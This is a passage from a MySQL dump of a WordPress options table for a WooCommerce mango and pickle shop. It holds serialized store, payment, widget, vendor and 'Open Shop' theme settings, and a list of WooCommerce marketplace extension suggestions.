','yes'),(204,'woocommerce_price_decimal_sep','.','yes'),(205,'woocommerce_price_num_decimals','2','yes'),(206,'woocommerce_shop_page_id','8','yes'),(207,'woocommerce_cart_redirect_after_add','no','yes'),(208,'woocommerce_enable_ajax_add_to_cart','no','yes'),(209,'woocommerce_placeholder_image','7','yes'),(210,'woocommerce_weight_unit','kg','yes'),(211,'woocommerce_dimension_unit','cm','yes'),(212,'woocommerce_enable_reviews','no','yes'),(213,'woocommerce_review_rating_verification_label','yes','no'),(214,'woocommerce_review_rating_verification_required','no','no'),(215,'woocommerce_enable_review_rating','yes','yes'),(216,'woocommerce_review_rating_required','yes','no'),(217,'woocommerce_manage_stock','yes','yes'),(218,'woocommerce_hold_stock_minutes','60','no'),(219,'woocommerce_notify_low_stock','yes','no'),(220,'woocommerce_notify_no_stock','yes','no'),(221,'woocommerce_stock_email_recipient','wp@dxpsites.com','no'),(222,'woocommerce_notify_low_stock_amount','2','no'),(223,'woocommerce_notify_no_stock_amount','0','yes'),(224,'woocommerce_hide_out_of_stock_items','no','yes'),(225,'woocommerce_stock_format','','yes'),(226,'woocommerce_file_download_method','force','no'),(227,'woocommerce_downloads_redirect_fallback_allowed','no','no'),(228,'woocommerce_downloads_require_login','no','no'),(229,'woocommerce_downloads_grant_access_after_payment','yes','no'),(230,'woocommerce_downloads_add_hash_to_filename','yes','yes'),(231,'woocommerce_prices_include_tax','no','yes'),(232,'woocommerce_tax_based_on','shipping','yes'),(233,'woocommerce_shipping_tax_class','inherit','yes'),(234,'woocommerce_tax_round_at_subtotal','no','yes'),(235,'woocommerce_tax_classes','','yes'),(236,'woocommerce_tax_display_shop','excl','yes'),(237,'woocommerce_tax_display_cart','excl','yes'),(238,'woocommerce_price_display_suffix','','yes'),(239,'woocommerce_tax_total_display','itemized','no'),(240,'woocommerce_enable_shipping_calc','yes','no'),(241,'woocommerce_shipping_cost_requires_address','no','yes'),(242,'woocommerce_ship_to_destination','shipping','no'),(243,'woocommerce_shipping_debug_mode','no','yes'),(244,'woocommerce_enable_guest_checkout','yes','no'),(245,'woocommerce_enable_checkout_login_reminder','no','no'),(246,'woocommerce_enable_signup_and_login_from_checkout','no','no'),(247,'woocommerce_enable_myaccount_registration','yes','no'),(248,'woocommerce_registration_generate_username','yes','no'),(249,'woocommerce_registration_generate_password','no','no'),(250,'woocommerce_erasure_request_removes_order_data','no','no'),(251,'woocommerce_erasure_request_removes_download_data','no','no'),(252,'woocommerce_allow_bulk_remove_personal_data','no','no'),(253,'woocommerce_registration_privacy_policy_text','Your personal data will be used to support your experience throughout this website, to manage access to your account, and for other purposes described in our [privacy_policy].','yes'),(254,'woocommerce_checkout_privacy_policy_text','Your personal data will be used to process your order, support your experience throughout this website, and for other purposes described in our [privacy_policy].','yes'),(255,'woocommerce_delete_inactive_accounts','a:2:{s:6:\"number\";s:0:\"\";s:4:\"unit\";s:6:\"months\";}','no'),(256,'woocommerce_trash_pending_orders','a:2:{s:6:\"number\";s:0:\"\";s:4:\"unit\";s:4:\"days\";}','no'),(257,'woocommerce_trash_failed_orders','a:2:{s:6:\"number\";s:0:\"\";s:4:\"unit\";s:4:\"days\";}','no'),(258,'woocommerce_trash_cancelled_orders','a:2:{s:6:\"number\";s:0:\"\";s:4:\"unit\";s:4:\"days\";}','no'),(259,'woocommerce_anonymize_completed_orders','a:2:{s:6:\"number\";s:0:\"\";s:4:\"unit\";s:6:\"months\";}','no'),(260,'woocommerce_email_from_name','MangoMitra','no'),(261,'woocommerce_email_from_address','mango@homedirect.in','no'),(262,'woocommerce_email_header_image','','no'),(263,'woocommerce_email_footer_text','{site_title} &mdash; Built with {WooCommerce}','no'),(264,'woocommerce_email_base_color','#ead447','no'),(265,'woocommerce_email_background_color','#f7f7f7','no'),(266,'woocommerce_email_body_background_color','#ffffff','no'),(267,'woocommerce_email_text_color','#3c3c3c','no'),(268,'woocommerce_merchant_email_notifications','no','no'),(269,'woocommerce_cart_page_id','9','no'),(270,'woocommerce_checkout_page_id','10','no'),(271,'woocommerce_myaccount_page_id','11','no'),(272,'woocommerce_terms_page_id','','no'),(273,'woocommerce_checkout_pay_endpoint','order-pay','yes'),(274,'woocommerce_checkout_order_received_endpoint','order-received','yes'),(275,'woocommerce_myaccount_add_payment_method_endpoint','add-payment-method','yes'),(276,'woocommerce_myaccount_delete_payment_method_endpoint','delete-payment-method','yes'),(277,'woocommerce_myaccount_set_default_payment_method_endpoint','set-default-payment-method','yes'),(278,'woocommerce_myaccount_orders_endpoint','orders','yes'),(279,'woocommerce_myaccount_view_order_endpoint','view-order','yes'),(280,'woocommerce_myaccount_downloads_endpoint','downloads','yes'),(281,'woocommerce_myaccount_edit_account_endpoint','edit-account','yes'),(282,'woocommerce_myaccount_edit_address_endpoint','edit-address','yes'),(283,'woocommerce_myaccount_payment_methods_endpoint','payment-methods','yes'),(284,'woocommerce_myaccount_lost_password_endpoint','lost-password','yes'),(285,'woocommerce_logout_endpoint','customer-logout','yes'),(286,'woocommerce_api_enabled','no','yes'),(287,'woocommerce_allow_tracking','no','no'),(288,'woocommerce_show_marketplace_suggestions','yes','no'),(289,'woocommerce_single_image_width','50','yes'),(290,'woocommerce_thumbnail_image_width','300','yes'),(291,'woocommerce_checkout_highlight_required_fields','yes','yes'),(292,'woocommerce_demo_store','no','no'),(293,'woocommerce_permalinks','a:5:{s:12:\"product_base\";s:8:\"/product\";s:13:\"category_base\";s:16:\"product-category\";s:8:\"tag_base\";s:11:\"product-tag\";s:14:\"attribute_base\";s:0:\"\";s:22:\"use_verbose_page_rules\";b:0;}','yes'),(294,'current_theme_supports_woocommerce','yes','yes'),(295,'woocommerce_queue_flush_rewrite_rules','no','yes'),(298,'default_product_cat','15','yes'),(300,'woocommerce_refund_returns_page_id','12','yes'),(303,'woocommerce_paypal_settings','a:23:{s:7:\"enabled\";s:2:\"no\";s:5:\"title\";s:6:\"PayPal\";s:11:\"description\";s:85:\"Pay via PayPal; you can pay with your credit card if you don\'t have a PayPal account.\";s:5:\"email\";s:15:\"wp@dxpsites.com\";s:8:\"advanced\";s:0:\"\";s:8:\"testmode\";s:2:\"no\";s:5:\"debug\";s:2:\"no\";s:16:\"ipn_notification\";s:3:\"yes\";s:14:\"receiver_email\";s:15:\"wp@dxpsites.com\";s:14:\"identity_token\";s:0:\"\";s:14:\"invoice_prefix\";s:3:\"WC-\";s:13:\"send_shipping\";s:3:\"yes\";s:16:\"address_override\";s:2:\"no\";s:13:\"paymentaction\";s:4:\"sale\";s:9:\"image_url\";s:0:\"\";s:11:\"api_details\";s:0:\"\";s:12:\"api_username\";s:0:\"\";s:12:\"api_password\";s:0:\"\";s:13:\"api_signature\";s:0:\"\";s:20:\"sandbox_api_username\";s:0:\"\";s:20:\"sandbox_api_password\";s:0:\"\";s:21:\"sandbox_api_signature\";s:0:\"\";s:12:\"_should_load\";s:2:\"no\";}','yes'),(304,'woocommerce_version','9.8.5','yes'),(305,'woocommerce_db_version','6.2.1','yes'),(306,'woocommerce_inbox_variant_assignment','2','yes'),(310,'_transient_jetpack_autoloader_plugin_paths','a:1:{i:0;s:29:\"{{WP_PLUGIN_DIR}}/woocommerce\";}','yes'),(311,'action_scheduler_lock_async-request-runner','68278ea4a2b210.70848876|1747422944','yes'),(312,'woocommerce_admin_notices','a:2:{i:0;s:6:\"update\";i:1;s:14:\"template_files\";}','yes'),(313,'woocommerce_maxmind_geolocation_settings','a:1:{s:15:\"database_prefix\";s:32:\"iwpdlBN8SGMk52OKrsxPnpqUb19zIw5Z\";}','yes'),(314,'_transient_woocommerce_webhook_ids_status_active','a:0:{}','yes'),(315,'widget_dc_product_vendors_info','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(316,'widget_dc_product_vendors_list','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:1:{s:5:\"title\";s:0:\"\";}}','yes'),(317,'widget_dc-vendor-quick-info','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(318,'widget_dc-vendor-store-location','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(319,'widget_wcmp_vendor_product_categories','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(320,'widget_wcmp_vendor_top_rated_products','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:2:{s:5:\"title\";s:25:\"Vendor top rated products\";s:6:\"number\";i:5;}}','yes'),(321,'widget_dc-vendor-vendor-review','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(322,'widget_wcmp_vendor_product_search','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:0:{}}','yes'),(323,'widget_wcmp_vendor_widget_policy','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(324,'widget_wcmp_vendor_coupons','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(325,'widget_wcmp_vendor_on_sale_products','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(326,'widget_wcmp_vendor_recent_products','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(327,'widget_woocommerce_widget_cart','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(328,'widget_woocommerce_layered_nav_filters','a:3:{s:12:\"_multiwidget\";i:1;i:3;a:0:{}i:5;a:0:{}}','yes'),(329,'widget_woocommerce_layered_nav','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:0:{}}','yes'),(330,'widget_woocommerce_price_filter','a:2:{i:1;a:1:{s:5:\"title\";s:15:\"Filter by price\";}s:12:\"_multiwidget\";i:1;}','yes'),(331,'widget_woocommerce_product_categories','a:4:{i:1;a:8:{s:5:\"title\";s:18:\"Product categories\";s:7:\"orderby\";s:5:\"order\";s:8:\"dropdown\";i:0;s:5:\"count\";i:0;s:12:\"hierarchical\";i:1;s:18:\"show_children_only\";i:0;s:10:\"hide_empty\";i:1;s:9:\"max_depth\";s:0:\"\";}i:2;a:8:{s:5:\"title\";s:18:\"Product categories\";s:7:\"orderby\";s:5:\"order\";s:8:\"dropdown\";i:0;s:5:\"count\";i:0;s:12:\"hierarchical\";i:1;s:18:\"show_children_only\";i:0;s:10:\"hide_empty\";i:1;s:9:\"max_depth\";s:0:\"\";}s:12:\"_multiwidget\";i:1;i:4;a:8:{s:5:\"title\";s:18:\"Product categories\";s:7:\"orderby\";s:4:\"name\";s:8:\"dropdown\";i:0;s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:18:\"show_children_only\";i:0;s:10:\"hide_empty\";i:0;s:9:\"max_depth\";s:0:\"\";}}','yes'),(332,'widget_woocommerce_product_search','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(333,'widget_woocommerce_product_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(334,'widget_woocommerce_products','a:5:{i:1;a:7:{s:5:\"title\";s:8:\"Products\";s:6:\"number\";i:5;s:4:\"show\";s:8:\"featured\";s:7:\"orderby\";s:4:\"date\";s:5:\"order\";s:4:\"desc\";s:9:\"hide_free\";i:0;s:11:\"show_hidden\";i:0;}i:2;a:7:{s:5:\"title\";s:8:\"Products\";s:6:\"number\";i:2;s:4:\"show\";s:8:\"featured\";s:7:\"orderby\";s:4:\"date\";s:5:\"order\";s:4:\"desc\";s:9:\"hide_free\";i:0;s:11:\"show_hidden\";i:0;}i:3;a:7:{s:5:\"title\";s:8:\"Products\";s:6:\"number\";i:5;s:4:\"show\";s:0:\"\";s:7:\"orderby\";s:4:\"date\";s:5:\"order\";s:4:\"desc\";s:9:\"hide_free\";i:0;s:11:\"show_hidden\";i:0;}i:4;a:7:{s:5:\"title\";s:8:\"Products\";s:6:\"number\";i:5;s:4:\"show\";s:0:\"\";s:7:\"orderby\";s:4:\"date\";s:5:\"order\";s:4:\"desc\";s:9:\"hide_free\";i:0;s:11:\"show_hidden\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(335,'widget_woocommerce_recently_viewed_products','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(336,'widget_woocommerce_top_rated_products','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(337,'widget_woocommerce_recent_reviews','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(338,'widget_woocommerce_rating_filter','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(342,'woocommerce_admin_install_timestamp','1643010199','yes'),(343,'wc_remote_inbox_notifications_wca_updated','','off'),(346,'wc_remote_inbox_notifications_stored_state','O:8:\"stdClass\":2:{s:22:\"there_were_no_products\";b:1;s:22:\"there_are_now_products\";b:1;}','no'),(352,'dc_product_vendor_plugin_db_version','3.8.7','yes'),(353,'wc_blocks_surface_cart_checkout_probability','91','yes'),(354,'wc_blocks_db_schema_version','260','yes'),(355,'woocommerce_meta_box_errors','a:0:{}','yes'),(356,'dc_commission_offset_to_migrate','1','yes'),(357,'commission_data_migrated','1','yes'),(358,'wcmp_vendor_registration_form_data','a:5:{i:0;a:8:{s:2:\"id\";i:0;s:4:\"type\";s:7:\"textbox\";s:5:\"label\";s:4:\"Name\";s:6:\"hidden\";b:1;s:7:\"partial\";s:12:\"textbox.html\";s:11:\"placeholder\";s:0:\"\";s:8:\"required\";b:0;s:8:\"cssClass\";s:0:\"\";}i:1;a:8:{s:2:\"id\";i:2;s:4:\"type\";s:16:\"vendor_address_1\";s:5:\"label\";s:7:\"Address\";s:6:\"hidden\";b:1;s:7:\"partial\";s:21:\"vendor_address_1.html\";s:11:\"placeholder\";s:0:\"\";s:8:\"required\";b:0;s:8:\"cssClass\";s:0:\"\";}i:2;a:8:{s:2:\"id\";i:3;s:4:\"type\";s:12:\"vendor_phone\";s:5:\"label\";s:5:\"Phone\";s:6:\"hidden\";b:1;s:7:\"partial\";s:17:\"vendor_phone.html\";s:11:\"placeholder\";s:0:\"\";s:8:\"required\";b:0;s:8:\"cssClass\";s:0:\"\";}i:3;a:8:{s:2:\"id\";i:6;s:4:\"type\";s:11:\"vendor_city\";s:5:\"label\";s:4:\"City\";s:6:\"hidden\";b:1;s:7:\"partial\";s:16:\"vendor_city.html\";s:11:\"placeholder\";s:0:\"\";s:8:\"required\";b:0;s:8:\"cssClass\";s:0:\"\";}i:4;a:8:{s:2:\"id\";i:7;s:4:\"type\";s:15:\"vendor_postcode\";s:5:\"label\";s:8:\"PostCode\";s:6:\"hidden\";b:1;s:7:\"partial\";s:20:\"vendor_postcode.html\";s:11:\"placeholder\";s:0:\"\";s:8:\"required\";b:0;s:8:\"cssClass\";s:0:\"\";}}','yes'),(361,'_transient_woocommerce_reports-transient-version','1740670560','yes'),(368,'_transient_shipping-transient-version','1666872305','yes'),(371,'woocommerce_task_list_tracked_completed_tasks','a:7:{i:0;s:8:\"payments\";i:1;s:8:\"products\";i:2;s:8:\"shipping\";i:3;s:13:\"store_details\";i:4;s:3:\"tax\";i:5;s:8:\"purchase\";i:6;s:15:\"review-shipping\";}','yes'),(372,'woocommerce_task_list_completed_lists','a:2:{i:0;s:8:\"extended\";i:1;s:19:\"extended_two_column\";}','yes'),(379,'current_theme','Open Shop','yes'),(380,'theme_mods_open-shop','a:83:{i:0;b:0;s:18:\"nav_menu_locations\";a:4:{s:19:\"open-shop-main-menu\";i:27;s:21:\"open-shop-footer-menu\";i:0;s:20:\"open-shop-above-menu\";i:0;s:21:\"open-shop-sticky-menu\";i:27;}s:18:\"custom_css_post_id\";i:1172;s:19:\"open_shop_theme_clr\";s:7:\"#000000\";s:27:\"open_shop_top_slide_content\";s:492:\"[{\"text\":\"\",\"link\":\"\",\"text2\":\"undefined\",\"image_url\":\"https:\\/\\/themehunk.com\\/wp-themes\\/grocery-lite\\/wp-content\\/uploads\\/sites\\/128\\/2020\\/07\\/slider12-1.jpg\",\"logo_image_url\":\"https:\\/\\/themehunk.com\\/wp-themes\\/grocery-lite\\/wp-content\\/uploads\\/sites\\/128\\/2020\\/07\\/slide-logo.png\",\"title\":\"Fresh Vegetable\",\"price\":\"undefined\",\"number\":\"undefined\",\"subtitle\":\"We provide fresh vegetables.\",\"social_repeater\":\"undefined\",\"id\":\"social-repeater-5eff03cfa5aac\",\"shortcode\":\"undefined\"}]\";s:32:\"open_shop_top_slide_lay5_content\";s:1281:\"[{\"text\":\"undefined\",\"link\":\"\",\"text2\":\"undefined\",\"image_url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/adopt.jpg\",\"title\":\"undefined\",\"price\":\"undefined\",\"number\":\"undefined\",\"subtitle\":\"undefined\",\"social_repeater\":\"undefined\",\"id\":\"social-repeater-5eff03cfe32a8\",\"shortcode\":\"undefined\"},{\"text\":\"undefined\",\"link\":\"\",\"text2\":\"undefined\",\"image_url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle-1.webp\",\"title\":\"undefined\",\"price\":\"undefined\",\"number\":\"undefined\",\"subtitle\":\"undefined\",\"social_repeater\":\"undefined\",\"id\":\"customizer-repeater-61fa2d05cffce\",\"shortcode\":\"undefined\"},{\"text\":\"undefined\",\"link\":\"\",\"text2\":\"undefined\",\"image_url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/download-7.jpg\",\"title\":\"undefined\",\"price\":\"undefined\",\"number\":\"undefined\",\"subtitle\":\"undefined\",\"social_repeater\":\"undefined\",\"id\":\"customizer-repeater-61fa2d998d69b\",\"shortcode\":\"undefined\"},{\"text\":\"undefined\",\"link\":\"\",\"text2\":\"undefined\",\"image_url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/download-8-1.jpg\",\"title\":\"undefined\",\"price\":\"undefined\",\"number\":\"undefined\",\"subtitle\":\"undefined\",\"social_repeater\":\"undefined\",\"id\":\"customizer-repeater-62209b6fb280e\",\"shortcode\":\"undefined\"}]\";s:27:\"open_shop_highlight_content\";s:964:\"[{\"icon_value\":\"fa-asterisk\",\"text\":\"undefined\",\"text2\":\"undefined\",\"title\":\"Fresh Mangoes\",\"price\":\"undefined\",\"number\":\"undefined\",\"subtitle\":\"\",\"social_repeater\":\"undefined\",\"id\":\"social-repeater-5eff03cf25448\",\"shortcode\":\"undefined\"},{\"icon_value\":\"fa-globe\",\"text\":\"undefined\",\"text2\":\"undefined\",\"title\":\"Direct From Farms\",\"price\":\"undefined\",\"number\":\"undefined\",\"subtitle\":\"\",\"social_repeater\":\"undefined\",\"id\":\"social-repeater-5eff03cf53926\",\"shortcode\":\"undefined\"},{\"icon_value\":\"fa-bookmark\",\"text\":\"undefined\",\"text2\":\"undefined\",\"title\":\"A+ Export Quality\",\"price\":\"undefined\",\"number\":\"undefined\",\"subtitle\":\"\",\"social_repeater\":\"undefined\",\"id\":\"social-repeater-5eff03cf3efb3\",\"shortcode\":\"undefined\"},{\"icon_value\":\"fa-plane\",\"text\":\"undefined\",\"text2\":\"undefined\",\"title\":\"Door Step Delivery\",\"price\":\"undefined\",\"number\":\"undefined\",\"subtitle\":\"\",\"social_repeater\":\"undefined\",\"id\":\"customizer-repeater-5eff06b2b2547\",\"shortcode\":\"undefined\"}]\";s:27:\"open_shop_category_tab_list\";a:4:{i:0;s:15:\"deal-of-the-day\";i:1;s:7:\"mangoes\";i:2;s:7:\"pickles\";i:3;s:14:\"pickle-mangoes\";}s:29:\"open_shop_category_slide_list\";a:9:{i:0;s:7:\"mangoes\";i:1;s:7:\"pickles\";i:2;s:14:\"pickle-mangoes\";i:3;s:17:\"mango-concentrate\";i:4;s:17:\"jams-and-squashes\";i:5;s:12:\"mango-juices\";i:6;s:11:\"mango-puree\";i:7;s:12:\"mango-squash\";i:8;s:11:\"dried-mango\";}s:21:\"open_shop_ribbon_text\";s:49:\"Summers are for mangoes and lets have it together\";s:25:\"open_shop_ribbon_btn_text\";s:9:\"SHOP HERE\";s:25:\"open_shop_ribbon_btn_link\";s:27:\"https://mangomitra.in/shop/\";s:26:\"open_shop_product_list_cat\";s:15:\"grocery-staples\";s:31:\"open_shop_single_row_prdct_list\";b:1;s:30:\"open_shop_product_list_heading\";s:15:\"Organic Mangoes\";s:32:\"open_shop_product_slider_heading\";s:8:\"Products\";s:36:\"open_shop_disable_category_slide_sec\";b:1;s:26:\"open_shop_top_slide_layout\";s:14:\"slide-layout-5\";s:25:\"open_shop_top_slider_optn\";b:1;s:28:\"open_shop_main_header_option\";s:6:\"callto\";s:29:\"open_shop_above_header_layout\";s:7:\"abv-one\";s:23:\"open_shop_col1_texthtml\";s:43:\"We are committed to provide service 24 X 7 \";s:31:\"open_shop_above_header_col2_set\";s:4:\"none\";s:23:\"open_shop_banner_layout\";s:7:\"bnr-one\";s:19:\"open_shop_bnr_1_img\";s:64:\"https://mangomitra.in/wp-content/uploads/2022/02/banner-3-01.png\";s:37:\"open_shop_bottom_footer_widget_layout\";s:11:\"ft-wgt-four\";s:19:\"open_shop_bnr_1_url\";s:1:\"#\";s:11:\"custom_logo\";i:1896;s:13:\"title_disable\";b:0;s:15:\"tagline_disable\";b:0;s:20:\"open_shop_logo_width\";s:40:\"{\"desktop\":65,\"tablet\":145,\"mobile\":145}\";s:29:\"open_shop_above_footer_layout\";s:10:\"ft-abv-two\";s:31:\"open_shop_above_footer_col1_set\";s:6:\"social\";s:31:\"open_shop_above_footer_col2_set\";s:6:\"widget\";s:30:\"open_shop_bottom_footer_layout\";s:10:\"ft-btm-one\";s:32:\"open_shop_bottom_footer_col2_set\";s:6:\"search\";s:23:\"open_shop_above_ftr_hgt\";s:38:\"{\"desktop\":51,\"tablet\":30,\"mobile\":30}\";s:28:\"open_shop_above_frt_brdr_clr\";s:7:\"#eaeaea\";s:16:\"background_color\";s:6:\"ffffff\";s:26:\"open_shop_preloader_enable\";b:1;s:23:\"open_shop_loader_bg_clr\";s:7:\"#ffffff\";s:32:\"open_shop_preloader_image_upload\";s:0:\"\";s:30:\"open_shop_main_hdr_calto_email\";s:18:\"namaste@gopalak.in\";s:28:\"open_shop_main_hdr_calto_nub\";s:14:\"+91 7411722844\";s:23:\"open_shop_sticky_header\";b:0;s:25:\"social_shop_link_pintrest\";s:0:\"\";s:23:\"social_shop_link_tumblr\";s:0:\"\";s:24:\"social_shop_link_youtube\";s:56:\"https://www.youtube.com/channel/UCBFa54LhEHcG6-g74now0kA\";s:28:\"social_shop_link_stumbleupon\";s:0:\"\";s:24:\"social_shop_link_dribble\";s:0:\"\";s:22:\"social_shop_link_skype\";s:0:\"\";s:25:\"social_shop_link_linkedin\";s:39:\"https://www.linkedin.com/in/homedirect/\";s:28:\"open_shop_product_slider_cat\";s:1:\"0\";s:25:\"open_shop_cat_tab_heading\";s:11:\"Top Selling\";s:30:\"open_shop_above_mobile_disable\";b:1;s:31:\"open_shop_above_header_col1_set\";s:4:\"none\";s:21:\"open_shop_abv_hdr_hgt\";s:38:\"{\"desktop\":20,\"tablet\":35,\"mobile\":35}\";s:31:\"open_shop_woo_product_animation\";s:4:\"zoom\";s:25:\"social_shop_link_facebook\";s:55:\"https://www.facebook.com/profile.php?id=100086755356605\";s:24:\"social_shop_link_twitter\";s:37:\"https://www.twitter.com/@HomeDirectIN\";s:22:\"social_shop_link_insta\";s:0:\"\";s:16:\"background_image\";s:0:\"\";s:17:\"background_repeat\";s:9:\"no-repeat\";s:21:\"background_attachment\";s:6:\"scroll\";s:17:\"background_preset\";s:6:\"custom\";s:21:\"background_position_x\";s:6:\"center\";s:21:\"background_position_y\";s:6:\"center\";s:15:\"background_size\";s:7:\"contain\";s:21:\"open_shop_move_to_top\";b:1;s:13:\"open_shop_rtl\";b:0;s:30:\"open_shop_single_row_slide_cat\";b:0;s:27:\"open_shop_product_list_cata\";s:7:\"mangoes\";s:28:\"open_shop_cat_slider_heading\";s:16:\"Shop By Category\";s:26:\"open_shop_top_slider_speed\";i:1100;s:24:\"open_shop_above_brdr_clr\";s:7:\"#7af902\";s:12:\"header_image\";s:13:\"remove-header\";s:22:\"open_shop_color_scheme\";s:9:\"opn-light\";s:18:\"open_shop_text_clr\";s:7:\"#000000\";s:18:\"open_shop_link_clr\";s:7:\"#000000\";s:19:\"open_shop_title_clr\";s:7:\"#000000\";s:22:\"open_shop_link_hvr_clr\";s:7:\"#000000\";s:26:\"open_shop_abv_hdr_botm_brd\";s:36:\"{\"desktop\":23,\"tablet\":0,\"mobile\":0}\";s:28:\"open_shop_main_header_layout\";s:11:\"mhdrdefault\";}','yes'),(381,'theme_switched','','yes'),(382,'woocommerce_maybe_regenerate_images_hash','210148b81f7ff6e91423ed70f813158c','yes'),(387,'widget_th-about-me-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(388,'widget_themehunk-customizer-section-four','a:2:{i:1;a:4:{s:5:\"title\";s:11:\"Latest News\";s:4:\"cate\";i:0;s:5:\"count\";s:1:\"3\";s:7:\"orderby\";s:9:\"post_date\";}s:12:\"_multiwidget\";i:1;}','yes'),(391,'widget_thaps-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(395,'_transient_product_query-transient-version','1704868716','yes'),(396,'category_children','a:0:{}','yes'),(401,'spmv_multivendor_table_migrated','1','yes'),(405,'woocommerce_demo_store_notice','This is a demo store for testing purposes &mdash; no orders shall be fulfilled.','yes'),(406,'woocommerce_shop_page_display','','yes'),(408,'woocommerce_category_archive_display','','yes'),(410,'woocommerce_default_catalog_orderby','menu_order','yes'),(411,'woocommerce_catalog_columns','4','yes'),(412,'woocommerce_catalog_rows','4','yes'),(413,'woocommerce_thumbnail_cropping','1:1','yes'),(414,'woocommerce_thumbnail_cropping_custom_width','6','yes'),(415,'woocommerce_thumbnail_cropping_custom_height','6','yes'),(416,'woocommerce_checkout_company_field','hidden','yes'),(417,'woocommerce_checkout_address_2_field','optional','yes'),(418,'woocommerce_checkout_phone_field','required','yes'),(419,'woocommerce_checkout_terms_and_conditions_checkbox_text','I have read and agree to the website [terms]','yes'),(420,'open_shop_header_retina_logo','https://mangomitra.in/wp-content/uploads/2022/03/l3-01.png','yes'),(421,'nav_menus_created_posts','a:0:{}','yes'),(422,'site_logo','1896','yes'),(434,'woocommerce_wcmp_vendor_shipping_settings','a:0:{}','yes'),(446,'widget_recent-comments','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(447,'widget_recent-posts','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(511,'woocommerce_marketplace_suggestions','a:2:{s:11:\"suggestions\";a:28:{i:0;a:4:{s:4:\"slug\";s:28:\"product-edit-meta-tab-header\";s:7:\"context\";s:28:\"product-edit-meta-tab-header\";s:5:\"title\";s:22:\"Recommended extensions\";s:13:\"allow-dismiss\";b:0;}i:1;a:6:{s:4:\"slug\";s:39:\"product-edit-meta-tab-footer-browse-all\";s:7:\"context\";s:28:\"product-edit-meta-tab-footer\";s:9:\"link-text\";s:21:\"Browse all extensions\";s:3:\"url\";s:64:\"https://woocommerce.com/product-category/woocommerce-extensions/\";s:8:\"promoted\";s:31:\"category-woocommerce-extensions\";s:13:\"allow-dismiss\";b:0;}i:2;a:9:{s:4:\"slug\";s:46:\"product-edit-mailchimp-woocommerce-memberships\";s:7:\"product\";s:33:\"woocommerce-memberships-mailchimp\";s:14:\"show-if-active\";a:1:{i:0;s:23:\"woocommerce-memberships\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:116:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/mailchimp-for-memberships.svg\";s:5:\"title\";s:25:\"Mailchimp for Memberships\";s:4:\"copy\";s:79:\"Completely automate your email lists by syncing membership changes to Mailchimp\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:67:\"https://woocommerce.com/products/mailchimp-woocommerce-memberships/\";}i:3;a:9:{s:4:\"slug\";s:19:\"product-edit-addons\";s:7:\"product\";s:26:\"woocommerce-product-addons\";s:14:\"show-if-active\";a:2:{i:0;s:25:\"woocommerce-subscriptions\";i:1;s:20:\"woocommerce-bookings\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:106:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/product-add-ons.svg\";s:5:\"title\";s:15:\"Product Add-Ons\";s:4:\"copy\";s:93:\"Offer add-ons like gift wrapping, special messages or other special options for your products\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:49:\"https://woocommerce.com/products/product-add-ons/\";}i:4;a:9:{s:4:\"slug\";s:46:\"product-edit-woocommerce-subscriptions-gifting\";s:7:\"product\";s:33:\"woocommerce-subscriptions-gifting\";s:14:\"show-if-active\";a:1:{i:0;s:25:\"woocommerce-subscriptions\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:116:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/gifting-for-subscriptions.svg\";s:5:\"title\";s:25:\"Gifting for Subscriptions\";s:4:\"copy\";s:70:\"Let customers buy subscriptions for others - they\'re the ultimate gift\";s:11:\"button-text\";s:10:\"Learn More\";s:3:\"url\";s:67:\"https://woocommerce.com/products/woocommerce-subscriptions-gifting/\";}i:5;a:9:{s:4:\"slug\";s:42:\"product-edit-teams-woocommerce-memberships\";s:7:\"product\";s:33:\"woocommerce-memberships-for-teams\";s:14:\"show-if-active\";a:1:{i:0;s:23:\"woocommerce-memberships\";}s:7:\"context\";a:1:{i:0;s:26:\"product-edit-meta-tab-body\";}s:4:\"icon\";s:112:\"https://woocommerce.com/wp-content/plugins/wccom-plugins/marketplace-suggestions/icons/teams-for-memberships.svg\";s:5:\"title\";s:21:\"Teams for Memberships\";s:4:\"copy\";s:123:\"Adds B2B functionality to WooCommerce Memberships, allowing sites to sell team, group, corporate, or family member 